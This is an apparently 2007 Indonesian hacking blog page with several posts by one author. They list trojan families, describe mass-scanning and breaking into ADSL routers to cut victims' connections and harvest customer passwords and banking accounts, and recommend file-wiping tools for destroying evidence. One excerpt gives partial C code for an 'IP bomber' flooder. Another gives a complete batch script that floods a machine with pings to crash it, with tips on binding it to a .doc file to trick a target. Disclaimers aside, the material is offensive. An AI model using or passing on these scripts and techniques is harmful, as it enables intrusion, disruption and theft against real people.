|
|
|
Hacking
|
Trojanku Sayang..Trojanku Hilang |
|
Written by lirva32
|
|
Sunday, 15 July 2007 |
|
. TROJAN KU SAYANG... TROJAN KU HILANG .
Author : lirva32
lirva32 [at] yahoo [dot] com
 Whackamole, Theipspoof.zip, Acid Shiver, BoSniffer.... ya trojan generasi pertama yang gue mainkan beberapa tahun yang lalu (--1996) kini sudah tidak terdengar lagi bentuk rupanya... ;) waktu itu memang gue ga tau pasti fungsi utama dari trojan... yang gue tau waktu itu cuma buat ngeremote PC aza.. ga ada tugas lain kali... dan hampir sulit gue bedakan antara Trojan dengan RAT (--Remote Administration Tool) karena kedua2nya mempunyai peran yang sama. Berikutnya sejarah mencatat perkembangan BackOrifice yang begitu mengejutkan... trojan ini pun awalnya gue anggap sama.. hanya untuk ngeremote PC he..he... dan mungkin juga keawaman gue saat itu.. sampe2 untuk urusan trojan gue juga ga tau bagaimana teknik penyebaran, penanaman dan pemanenanya... jadi gue duduk di komputer lawan dan gue tanam trojan... manual bangetkan teknik penyebarannya... ;)
Haaaahhh sudahlah, itu cuma masa lalu gue yang begitu lucu dan bodoh... --sekarang juga sebenarnya masih bodoh-- waktulah yang akan mengarahkan segala sesuatunya untuk tetap bisa berteman dengan trojan.
Bagi gue, trojan itu merupakan program yang tidak syah yang dimasukkan kedalam program yang syah sehingga program yang tidak syah ini akan menjalankan sesuatu fungsi yang tidak dikenal dan tidak dikehendaki oleh pemakainya --pasti pemakai windows loh ;) -- Kadang aku menyebutnya dengan BackDoor.
Banyak sekali jumlah trojan di bumi IT ini, yang gue tau seperti : | [1]
| Asylum Trojan, ada beberapa trojan yang masuk kedalam jenis ini diantaranya : Asylum_013, Asylum_mini_11, Mini Asylum 1_0 |
[2]
|
Bionet Trojan, yang termasuk kedalam jenis ini diantaranya : Bionet 318 Unpacked, Bionet 318, BioNet BioNix 1_3, BioNet CGI Logger
|
[3]
|
DeepThroat Trojan, diantaranya : Deep Throat 3_1 Secure server, Deep Throat 3_1 Server,Deep Throat 3_1, Deep Throat Foreplay,Deep Throat Orgasm.
| |
[4]
|
Infector Trojan, diantaranya : Infector 1_7, Infector 1_9, Infector 2_0 Bonus, Infector 2_0a, Infector_18f
|
[5]
|
SubSeven Trojan, diantaranya : SubSeven 2 _1a, SubSeven 2_0, SubSeven 2_1 Gold, SubSeven 2_1,SubSeven 2_2 Beta, SubSeven Bonus Client, SubSeven Cleaner 2_0, SubSeven Codename MUIE, SubSeven DefCon Edition, SubSeven Fake Server, SubSeven Registry Fix, SubSeven Sniper, Subseven Unpacked 2_0 Server, Subseven Unpacked MUIE Server.
| | | -- ternyata sub seven trojan paling banyak loh.. sehingga mudah dikenali oleh AV ;) |
[6]
| Undetected Trojan, diantaranya : UnDetected 3_2, UnDetected 3_3,Undetected Compressor Plugin, Undetected General Info Plugin, Undetected IRChole Plugin, Undetected Special Edition.
| [7] | Y3k Trojan, diantaranya : y3k_16, y3k_16_ms,y3k_16_unpacked | |
|
Last Updated ( Monday, 16 July 2007 )
|
|
Read more...
|
|
|
Written by lirva32
|
|
Sunday, 08 July 2007 |
Shooting a Butterfly :
- Pembobolan Ratusan bahkan Ribuan Router ADSL - author : lirva32 [at] yahoo [dot] com 
---// Disclaimmer
Tulisan ini hanya digunakan untuk proses pembelajaran saja. Penulis tidak bertanggung jawab atas tindakan anarkis dan destruktif yang diakibatkan dari tulisan ini.
---// Pendahuluan
Siang ini... keisengan saya muncul setelah "Matdhule" mengajak berdiskusi tentang proses Scanning. Ia memberikan ide untuk melakukan proses scanning ip yang dipergunakan oleh pelanggan ADSL. Konsep sebenarnya adalah setiap pemakai ADSL akan mendapatkan 1 IP untuk mengkoneksikan diri ke internet. Biasanya untuk pemakai ADSL unlimmited akan mendapatkan IP yang sifatnya tidak berubah- ubah. Berbeda dengan pelanggan ADSL yang limitted... IP yang dipergunakan akan berubah² setiap melakukan koneksi ke internet.
Dasar inilah yang membuat keisengan saya mulai bekerja, melakukan proses scanning dan gainning. Bayangkan saja dalam waktu 1 jam saya bisa mendapatkan 39920 IP yang dalam kondisi aktif... dari jumlah itu... saya mencoba 29 IP secara random.... hhhmmmm... 19 IP Router ADSL bisa dimasuki begitu saja.....
Banyak sekali kegiatan yang bisa dilakukan apabila kita sudah bisa menguasai Router ADSL tersebut, diantaranya : o1. Melumpuhkan Inet Connection
Wahh, saya tidak menginginkan Anda melakukan kegiatan ini... Anda tinggal melakukan 'Stop' terhadap servicesnya saja... terutama services "HTTP" otomatis semua PC yang mengarah gatewaynya pada Router ADSL tersebut tidak mendapatkan akses internet... Now, No : HTTP, FTP, SSH, Telnet and NNTP ;)
o2. Mendapatkan ID + Password Pelanggan
Wah.... kalo yang ini terserah deh... boleh juga di ambil.. siapa tau berguna.
03. Melakukan Spoffing ke IP tersebut
wah... kalo yang ini ga susah2 mencari account online banking... spoffing aza 1 hari...2 hari.. 3 hari.... sampai dapet.... tungguin sampe tua juga gpp....
o4. Sebenarnya masih banyak banget yang bisa kita lakukan... nanti coba cari tau aza sendiri...
kalo dah dapet lagi kita sharing²... kan enak kalo belajar bareng... iye ga.... cappeee ddeccchhhhh....
---// Persiapan
Apa sih yang harus kita persiapkan....
ooO. Amankan diri Anda sebelum diamankan oleh orang lain...
oO1. www.dnsstuff.com
oO2. IP Scanner, hari ini saya berada di kantor.. krn PC yang saya pake OS berbasis Windows jadi saya pake IP Scanner yg namanya : Angry IP Scanner
oo3. Koneksi Internet , yang ini... kudu bin wajib... kalo ga ada jangan coba2 mengacungkan pistol di warnet
|
|
Last Updated ( Sunday, 15 July 2007 )
|
|
Read more...
|
|
|
Written by lirva32
|
|
Sunday, 08 July 2007 |
|
-- Denial of Deleted a.k.a DoD --
[ Mengenal : File Wiping ] author : lirva32 [at] yahoo [dot] com
Anda memiliki dokumen rahasia...dan orang lain tidak boleh membacanya...?
Biasanya kalo dokumen rahasianya berupa kertas sehabis membaca pasti Anda simpan ditempat rahasia... tapi kalo udah ga dipake pasti dibuang, disobek-sobek atau mungkin juga memakai mesin penghancur kertas. Tapi bagaimana kalo itu berupa file di komputer...? Apakah cukup dihapus.. cukup diformat..? semua langkah itu tidak akan aman, orang lain masih bisa menjamah file rahasia Anda... itu hal yang sangat mudah sekali...
Bagaimana caranya supaya file rahasia kita tidak memiliki jejak sehingga orang lain tidak bisa melakukan recovery sama sekali... jawabannya adalah File Wiping.
File Wiping sangat dikenal sekali dikalangan dunia Underground.. konsepnya tidak berbeda dengan 'covering track'. Covering Track dilakukan untuk menghilangkan jejak ketika selesai melakukan Attacking sedangkan File Wiping hanya digunakan untuk menghilangkan bukti2 otentik, mematikan secara sempurna proses digital forensic.
Jika kita melakukan sebuah File Wipping jangan berharap kita bisa mendapatkan kembali data2 | file2 yang sudah kita buang karena proses pembersihan secara phisik (zero truncating) dan logic (cluster overhang) pada media penyimpanan sudah teracak sehingga proses tracing sangat sulit dilakukan.
Penulis sudah menemukan beberapa tools yang bisa dipergunakan untuk malakukan file wiping (-- hampir semuanya berbasis windows, selama riset sama sekali tidak menemukan file wiping berbasis Linux). Hasil oprak-oprek menujukkan beberapa aplikasi recovery seperti : Easy Recovery, File Inspector, Lost & Found tidak mampu untuk menemukan kembali file tresebut.
File2 Wiping yang bisa dipergunakan : | (1) | Analogx Supershredder | -- lirva32 tested (12-12-2005), very good | | (2) | Annihilator | -- lirva32 tested (12-12-2005), fair | | (3) | Bcwipe | -- lirva32 tested (12-13-2005), good | | (4) | Cr-Zap2k | -- lirva32 tested (12-15-2005), good | | (5) | Eraser | -- lirva32 tested (12-16-2005), very good | | (6) | Evidence Eliminator | -- lirva32 tested (07-07-2007), very good | | (7) | Executive Document Shredder | -- lirva32 tested (07-07-2007), good | | (8) | File Shredder | -- lirva32 tested (07-07-2007), good | | (9) | Handy File Shredder | -- lirva32 tested (07-08-2007), very good | | (10) | Mutilate File Wiper | -- lirva32 tested (07-08-2007), fair | | (11) | Necrofile | -- lirva32 tested (07-08-2007), good | | (12) | Nt File Wipe Utility | -- lirva32 tested (07-08-2007), fair | | (13) | Shiva Destroyer Of Files | -- lirva32 tested (07-08-2007), good | | (14) | Shredder95 | -- lirva32 tested (07-08-2007), good | | (15) | Supershredder | -- lirva32 tested (07-08-2007), good | | (16) | Sure Delete | -- lirva32 tested (07-08-2007), good | | (17) | Ultrawipe | -- lirva32 tested (07-08-2007), excelent |
Dimana bisa donwloadnya...?? hhuuss bodddoohh... nyalakan inetnya... ketik : google.com, cari lewat sana...!!!!
Nah, silahkan Anda google dan donwload deh...
Sekarang mulailah Anda gunakan untuk membuang segala sesuatu yang bisa menjadi barang bukti... lol
**** penting utk peringatan *****
Lirva32 tidak bertanggung jawab atas tindakan destruktif dari tulisan ini.. tidak mempergunakan aplikasi2 tersebut untuk kejahatan, misalnya
saja untuk menghapus isi harddisk teman, kantor, etc lah. Juga tidak melakukan tindakan destruktif pada instansi sosial, lembaga pendidikan,
dan tempat2 yang memilki tangsi2 data penting. semoga bermanfaat, .thx
lirva32
|
|
Last Updated ( Monday, 09 July 2007 )
|
|
|
Written by lirva32
|
|
Thursday, 28 June 2007 |
|
-- IPBomb.C -- /* IP bomber */
/ *Tested : lirva32 -- status : OK in BSD 5.4*/
#define DEBUG
#include <netdb.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <netinet/tcp.h>
#include <signal.h>
#include <errno.h>
#include <string.h>
#include <stdio.h> #include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <time.h>
#include <sys/socket.h>
#include <netinet/in.h>
#ifndef __linux__
#include <in_systm.h>
#include <ip.h>
#else
#include <endian.h>
#include "/usr/src/linux/include/linux/in_systm.h"
#include "/usr/src/linux/net/inet/ip.h"
#include <linux/wait.h>
#include "/usr/src/linux/net/inet/skbuff.c"
#endif #include <assert.h> static unsigned int wait_time = 0;
static unsigned int packet_size = 80;
static unsigned int packet_count = 1000;
static int gateway = 0x0100007f;
static int destination = 0;
static unsigned int uflag = 0;
static unsigned int tflag = 0; static int socket_fd;
static struct sockaddr dest;
/* Convert an ASCII string to binary IP. Borrowed from linux/net/inet/utils.c */
unsigned long
in_aton(char *str)
{
unsigned long l;
unsigned int val;
int i; l = 0;
for (i = 0; i < 4; i++) {
l <<= 8;
if (*str != '\0') {
val = 0;
while (*str != '\0' && *str != '.') {
val *= 10;
val += *str - '0';
str++;
}
l |= val;
if (*str != '\0') str++;
}
}
return(htonl(l));
} |
|
Last Updated ( Monday, 02 July 2007 )
|
|
Read more...
|
|
|
Crashing Windows Ur Enemy |
|
Written by lirva32
|
|
Monday, 11 June 2007 |
|
-- CRASHING WINDOWS Ur ENEMY -- author : lirva32 [at] yahoo [dot] com Pagi ini gue duduk sendirian diruangan kerja... (--ditemenin setan kali yah...) Asistenku belum juga ada yang datang...(biasanya sih ban motornya gembos... atau macet... atau apalah.....) ditemani flu, migran dan batuk aku coba menulis sesuatu yang sangat berbahaya... sekali lagi... tidak mempergunakan apa yang sampaikan untuk kegiatan destruktif... cukup menjadi bahan tambahan informasi dan proses pembelajaran elo semuanya...
Baru aja gue nyoba melakukan flooding ke system windows di komputer yang biasa dipake 'Made'. Tau 'Made' ga...?? Made itu asisten gue yang tinggi, cukring, lucu n jjjeeelllxxxxxxx... awalnya sih gue iseng... karena gue pikir karena RAM yang dipakenya gede banget sampe 2 Gb.... hhhmmm... enak juga nih komputer buat sasaran....
Minum teh manies dulu aaahhhh..... srrruuuppuuutttttt..... nah, gue langsung inget dengan perintah 'ping'... percaya 'ga kalo perintah ping itu bisa buat iseng2 bin jahil..... gimana caranya : 1. Persiapkan sebuah file : *.bat, dengan isi sbb :
echo Windows NT/XP/2K/2K3 Localhost Flooding
echo Script ini menghasilkan tindakan destruktif, jadi jangan menjalankan script ini
echo di lingkungan Sekolah, Kampus, Institusi dan Organisasi penting.
echo lirva32 tidak bertanggung jawab atas semua tindakan.......
echo ----------------------------------------------------------------------------------------
echo.
echo Mengaktifkan Web Broser.... tunggu...
start /high http://www.echo.or.id/
echo Jika situs http://www.echo.or.id sudah aktif.. silahkan tekan sembarang tombol....
pause
cls
start /high /min taskmgr.exe
for %%d in ( A B C D E F G H I J K L M N O P Q R ) do start /min ping -l 65527 -n 100000 localhost
cls
echo ----------------------------------------------------------------------------------------
echo Sorry... Ur Windows crashed....... 2. Simpan file tersebut.. terserah namanya apa saja....
3. Google : bat2com, sebuah compiler merubah *.bat menjadi *.com
4. Lakukan pengcompile-an *.bat ke *.com (ga usah di compile sih gpp....)
5. Jalankan file tersebut di komputer target..... mau aman ya coba dibinding pake aplikasi pembinding... lakukan pembindingan dengan file *.doc jadi terkesan file yang kamu buat menyerupai *.doc.
.thx
lirva32
* ditulis di kantor tgl. 12 Juni 2007 |
|
Last Updated ( Monday, 11 June 2007 )
|
|
| | << Start < Prev 1 2 3 Next > End >>
| | Results 10 - 18 of 22 |
|
|
